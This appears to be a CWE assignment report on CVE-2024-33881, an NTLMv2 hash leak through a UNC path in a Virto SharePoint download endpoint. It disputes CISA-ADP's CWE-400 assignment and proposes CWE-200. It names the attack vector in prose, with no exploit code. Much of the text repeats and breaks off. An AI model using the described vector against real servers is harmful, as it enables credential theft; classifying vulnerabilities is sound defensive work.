CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
Original Vulnerability Description
CVE-2024-33881: An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. The Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method allows an NTLMv2 hash leak via a UNC share pathname in the path parameter.
Extracted Key Phrases
Key
Value
[WEAKNESS]
NTLMv2 hash leak
[PRODUCT]
VirtoSoftware Virto Bulk File Download for SharePoint
Not explicitly specified, but implied to be a malicious actor who can manipulate the path parameter
[IMPACT]
Potential exposure of NTLMv2 hash, which could lead to unauthorized access or further attacks
[VECTOR]
Manipulation of the path parameter in the Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method
[ROOTCAUSE]
Improper handling of UNC share pathnames in the path parameter of the isCompleted method
Chain
The vulnerability chain starts with the improper handling of UNC share pathnames in the isCompleted method of the Virto Bulk File Download component. This root cause allows an attacker to manipulate the path parameter, potentially leading to an NTLMv2 hash leak. The leak of NTLMv2 hashes could then be exploited for unauthorized access or further attacks on the SharePoint system.
Assigned CWEs
Due to limited information from the search tools, we can infer the following CWEs based on the vulnerability description:
CWE ID
CWE Name
CWE Description
CWE Abstraction Level
CWE Vulnerability Mapping Label
CWE Vulnerability Mapping Notes
CWE-200
Exposure of Sensitive Information to an Unauthorized Actor
The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Base
DISCOURAGED
The NTLMv2 hash leak exposes sensitive authentication information.
🐛 Summary
The assigned CWE-400: "Uncontrolled Resource Consumption" by CISA-ADP does not address the root cause weakness.
https://github.com/cisagov/vulnrichment/blob/07837010e13b885bbfdea2565052692312b96dc7/2024/33xxx/CVE-2024-33881.json#L92
CWE Assignment Report
More appropriate:
Original Vulnerability Description
CVE-2024-33881: An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. The Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method allows an NTLMv2 hash leak via a UNC share pathname in the path parameter.
Extracted Key Phrases
Chain
The vulnerability chain starts with the improper handling of UNC share pathnames in the isCompleted method of the Virto Bulk File Download component. This root cause allows an attacker to manipulate the path parameter, potentially leading to an NTLMv2 hash leak. The leak of NTLMv2 hashes could then be exploited for unauthorized access or further attacks on the SharePoint system.
Assigned CWEs
Due to limited information from the search tools, we can infer the following CWEs based on the vulnerability description: